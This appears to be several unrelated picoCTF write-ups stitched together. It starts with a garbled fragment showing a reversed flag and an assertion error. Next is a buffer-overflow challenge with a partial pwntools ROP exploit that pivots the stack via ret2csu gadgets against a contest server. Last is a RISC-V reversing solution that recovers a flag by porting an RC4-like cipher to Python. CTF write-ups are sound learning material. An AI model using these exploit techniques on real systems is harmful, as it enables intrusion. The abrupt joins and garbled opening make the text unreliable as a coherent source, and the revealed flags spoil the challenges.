}OY2GR309IH4jIO7X_erocs_lluf_boj_doog{FTCocip@ _0!-:0^ ^00-!0g00 v:,gg0>0:+ +:+:++:><+::+:*::+++<p0!:::+vv:!00g00p00**::+:+:!run: homework.c:115: step: Assertion `stack[sn-2] >= 0 && stack[sn-1] >= 0' failed.
A reversed flag }OY2GR309IH4jIO7X_erocs_lluf_boj_doog{FTCocip
is visible (since we looped backwards). Reversing this gets us the flag:
picoCTF{good_job_full_score_X7OIj4HI903RG2YO}
We are given a binary with no source that prints out whatever we send it in a horse speech bubble(like cowsay but with horse). Opening up the main function of the binary in Ghidra give us this disassembly:
undefined8 main(void)
{
undefined local_28 [32];
setup();
read(0,local_28,0x80);
horse(local_28);
return 0;
}
Immediately, we can see a buffer overflow, since the local_28
buffer is only 32 bytes long while we read in 128 bytes. With some math, we can calculate the number of space we have for a potential ROP chain: 128 - saved eip (8) - buffer length (32) = 88 bytes / 8 = 11 addresses. This isn't much space to work with, but let's take a look at the rest of the functions and see where we can go
setup:
void setup(void)
{
uint uVar1;
uint uVar2;
uint uVar3;
uint uVar4;
uint uVar5;
uint uVar6;
uint uVar7;
long lVar8;
undefined8 in_R8;
undefined8 in_R9;
undefined8 uVar9;
uint local_c;
lVar8 = seccomp_init(0);
local_c = 0;
if (lVar8 != 0) {
uVar9 = 0x4008ef;
uVar1 = seccomp_rule_add(lVar8,0x7fff0000,2,0);
uVar2 = seccomp_rule_add(lVar8,0x7fff0000,0,1,in_R8,in_R9,0x400000000,0,0,uVar9);
uVar3 = seccomp_rule_add(lVar8,0x7fff0000,1,1,in_R8,in_R9,0x400000000,1,0);
uVar4 = seccomp_rule_add(lVar8,0x7fff0000,9,0);
uVar5 = seccomp_rule_add(lVar8,0x7fff0000,0xd9,0);
uVar6 = seccomp_rule_add(lVar8,0x7fff0000,0x3c,0);
uVar7 = seccomp_rule_add(lVar8,0x7fff0000,0xe7,0);
local_c = seccomp_load(lVar8);
local_c = uVar1 | uVar2 | uVar3 | uVar4 | uVar5 | uVar6 | uVar7 | local_c;
}
seccomp_release(lVar8);
if ((lVar8 == 0) || (local_c != 0)) {
error(1,0,"seccomp",0);
}
return;
}
This function initializes seccomp, restricting the syscalls that we can make. To look at the seccomp settings in a more legible format, we can use the seccomp-tools "dump" command:
In summary, we're only allow to call open, mmap, exit, getdents64, exit_group, as well as read and write (but we can only read from stdin and write to stdout). The getdents64 seems somewhat peculiar, but after viewing the Dockerfile it makes sense:
FROM redpwn/jail:sha-a795cdd
COPY --from=ubuntu@sha256:703218c0465075f4425e58fac086e09e1de5c340b12976ab9eb8ad26615c3715 / /srv
COPY bin/horse /srv/app/run
COPY bin/flag.txt /srv/app/flag.txt
RUN mv /srv/app/flag.txt /srv/app/flag-`cat /proc/sys/kernel/random/uuid`.txt
The flag file name is randomized, so we'll have to use the getdents64 syscall to get its name before we can read it.
Finally, we'll take a look at the horse function:
void horse(char *param_1)
{
int iVar1;
size_t sVar2;
char *local_20;
char *local_18;
int local_c;
sVar2 = strcspn(param_1,"\n");
param_1[sVar2] = '\0';
sVar2 = strlen(param_1);
local_c = (int)sVar2;
local_18 = (char *)0x0;
asprintf(&local_18,"%.*s",(ulong)(local_c + 2),PAD);
local_20 = (char *)0x0;
iVar1 = asprintf(&local_20," %s \n< %s >\n %s \n%s",local_18,param_1,local_18,HORSE);
write(1,local_20,(long)iVar1);
free(local_20);
free(local_18);
return;
}
The function is fairly straightforward and doesn't look like it mangles any potential ROP chain as long as we place a null byte before the rest of the chain (to prevent the strcspn from replacing a newline in our buffer).
With all that out of the way, we can get started with the ROP chain. Since our space is extremely limited, we will require multiple stages where we input a new ROP chain in each stage. To do this, we're going to have to be able to call read in some way, whether by returning to it in the plt or by using the read that's already in main. Before we do that, we'll need a way to populate our registers.
Binaries compiled with gcc generally include a __libc_csu_init
function, which contains 2 very useful "universal" gadgets. The two gadgets in the order they are used are as follows:
00400bfa 5b POP RBX
00400bfb 5d POP RBP
00400bfc 41 5c POP R12
00400bfe 41 5d POP R13
00400c00 41 5e POP R14
00400c02 41 5f POP R15
00400c04 c3 RET
00400be0 4c 89 fa MOV RDX ,R15
00400be3 4c 89 f6 MOV RSI ,R14
00400be6 44 89 ef MOV EDI ,R13D
00400be9 41 ff 14 dc CALL qword ptr [R12 + RBX*0x8]
These gadgets let us populate the top 3 argument registers: rdi (technically esi), rsi, and rdx. The problem lies with the last call
instruction. Although we control r12
and rbx
, r12 + rbx*0x8
needs to be the address of a pointer to a code segment. The only place in the binary where we can reasonably come upon these is the global offset table. However, after we return from the GOT function, we end up returning back into the middle of __libc_csu_init
. While it is possible to reach the ret at the end without any major troubles, we do not have enough space in our ROP chain to then return back to main (and provide another ROP payload).
This is where we were stuck for a good bit, until we realized that a loaded binary contains a writable page (generally used for global variables). This binary has PIE disabled, so this section is always at 0x602000. If we combine this knowledge with a leave; ret
gadget, we can pivot the stack over into another memory region that we know the address of. This is very useful when combined with the 2nd ret2csu gadget because we are able to store a pointer to any code segment and know the address of that pointer, allowing us to easily continue our ROP by pointing it to a simple pop _; ret
gadget (pop is necessary because call
adds an unwanted return address to __libc_csu_init
).
If we want to take advantage of this, we'll need to first read in something to our fake stack region before we pivot to it. After some searching, jumping into the middle of main appears to be a pretty good option:
00400b6f 48 8d 45 e0 LEA RAX =>local_28 ,[RBP + -0x20]
00400b73 ba 80 00 MOV EDX ,0x80
00 00
00400b78 48 89 c6 MOV RSI ,RAX
00400b7b bf 00 00 MOV EDI ,0x0
00 00
00400b80 e8 0b fc CALL read
ff ff
00400b85 48 8d 45 e0 LEA RAX =>local_28 ,[RBP + -0x20]
00400b89 48 89 c7 MOV RDI ,RAX
00400b8c e8 f7 fe CALL horse
ff ff
00400b91 b8 00 00 MOV EAX ,0x0
00 00
00400b96 c9 LEAVE
00400b97 c3 RET
Returning to 0x400b6f with our rbp updated to a value in the writable page will allow us to read in another ROP chain to our fake stack, and the leave
instruction (equivalent to mov rsp, rbp; pop rbp
) will pivot the stack into the new chain:
p = remote('mars.picoctf.net', 31809)
main_read = 0x400b6f # right before the read call in main
writable = 0x602908 # part of writable memory page in base binary
# STAGE 1 : STACK PIVOT
padding = b'\x00'*0x20
new_rbp = p64(writable+0x20) # +0x20 since main_read will subtract 0x20
rop = p64(main_read)
payload = padding + new_rbp + rop
payload += b'A'*(0x80 - len(payload))
p.send(payload)
In our second stage, we can now make proper use of the ret2csu gadgets given the fact that we can place arbitrary pointers on our new stack. This stage uses write@plt
to leak the address of read
from the global offset table, allowing us to later make use of libc ROP gadgets:
First we try to import into Ghidra 9.1.2, but it doesn't recognize the file type. We run file
on it and it says riscy: ELF 64-bit LSB executable, UCB RISC-V, version 1 (SYSV), statically linked, stripped
, so we try to manually set the language to RISC-V, but see that it's not recognized. After some searching, we see that we need to update Ghidra to version 9.2 or later.
Once we deal with that, we run Auto Analysis and look at the decompiler output. There are a few syscalls (ECALL
s) in there, and, as usual, the decompiler does show them, but treats it as not reading or modifying any registers, so it's difficult to tell what they're supposed to do. we manually analyze some of them, but then see that one of them is in a loop and it's a bit difficult to tell what exactly it does, so we decide to patch the ECALL
instructions into JAL
(jump and link = call) instructions to fake syscalls with correct signatures in a execute-only page added via the Memory Map window. The most annoying part is the fact that the immediate bits (which are an offset from the current instruction) are scrambled: imm[20] imm[10:1] imm[11] imm[19:12] rd opcode
, so with some trial and error, as well as adjusting the address in the memory map to account for the resulting address, we finally get the ECALL
s that are most problematic successfully patch into JAL
s for easier analysis.
Next, we see that there are two function calls. The first one initializes an array of 256 bytes:
void generate_shuffle(astruct *dest,byte *srcKey,ulonglong cbKey) {
ulonglong i2;
ulonglong idx;
longlong i1;
ulonglong prevIdx;
byte *pDest;
byte byte;
i1 = 0;
do {
dest->buf[i1] = (byte)i1;
i1 += 1;
} while (i1 != 0x100);
i2 = 0;
prevIdx = 0;
pDest = (byte *)dest;
do {
idx = i2 % cbKey;
byte = *pDest;
i2 += 1;
idx = SEXT48((int)((int)prevIdx + (uint)srcKey[idx] + (uint)byte));
prevIdx = idx & 0xff;
*pDest = dest->buf[idx & 0xff];
dest->buf[idx & 0xff] = byte;
pDest = pDest + 1;
} while (i2 != 0x100);
return;
}
The second is called in a loop, and is passed the same 256 byte array, and also accesses two more subsequent bytes, used as indices:
byte step(astruct *param_1) {
ulonglong idx1;
ulonglong idx2;
byte byte1;
byte byte2;
idx1 = (longlong)(int)(param_1->idx1 + 1) & 0xff;
param_1->idx1 = (byte)idx1;
byte1 = param_1->buf[idx1];
idx2 = (longlong)(int)((uint)param_1->idx2 + (uint)byte1) & 0xff;
param_1->idx2 = (byte)idx2;
byte2 = param_1->buf[idx2];
param_1->buf[idx1] = byte2;
param_1->buf[idx2] = byte1;
return param_1->buf[(longlong)(int)((uint)byte1 + (uint)byte2) & 0xff];
}
We then proceed to port the code to Python so we can solve for the input flag. After troubleshooting some mishaps, such as screwing up the step
function and mis-remembering which CTF we're doing (for the start of the flag), we eventually get the flag.
from string import *
from itertools import *
EXPECTED_STRING = "c5 75 95 a5 81 80 f3 44 f1 99 34 81 3a 5f 50 93 67 ee 12 0c 15 3a da 1c 6f 50 80 49 63 f2 36 d3 93 64 46 63 84 b5 3a 5a 9c 3e 40 f5 19 20 7f 08 00 48 0a 03"
EXPECTED = [int(x, 16) for x in EXPECTED_STRING.split()]
class State:
pass # buf, idx1, idx2
def generate_shuffle(key):
dest = list(range(0x100))
idx = 0
for i in range(0x100):
idx = (idx + key[i % len(key)] + dest[i]) % 0x100
dest[i], dest[idx] = dest[idx], dest[i]
return dest
def step(state):
state.idx1 = (state.idx1 + 1) % 0x100
byte1 = state.buf[state.idx1]
state.idx2 = (state.idx2 + byte1) % 0x100
byte2 = state.buf[state.idx2]
state.buf[state.idx1], state.buf[state.idx2] = byte2, byte1
return state.buf[(byte1 + byte2) % 0x100]
#CHARSET = list(map(chr, range(128)))
#CHARSET = ascii_lowercase + ascii_uppercase + digits + '-_{}'
#for inp in product(CHARSET, repeat=4):
# inp = 'pico' + ''.join(inp)
inp = 'picoCTF{'
buf = generate_shuffle([ord(x) for x in inp])
state = State()
state.buf = buf
state.idx1 = state.idx2 = 0
s = inp + ': '
for i in range(len(EXPECTED)):
x = step(state) ^ EXPECTED[i]
#if x >= 128:
# break
s += chr(x)
else:
print(s)
picoCTF{: picoCTF{4ny0n3_g0t_r1scv_h4rdw4r3?_LGUfwl8xyMUlpgvz}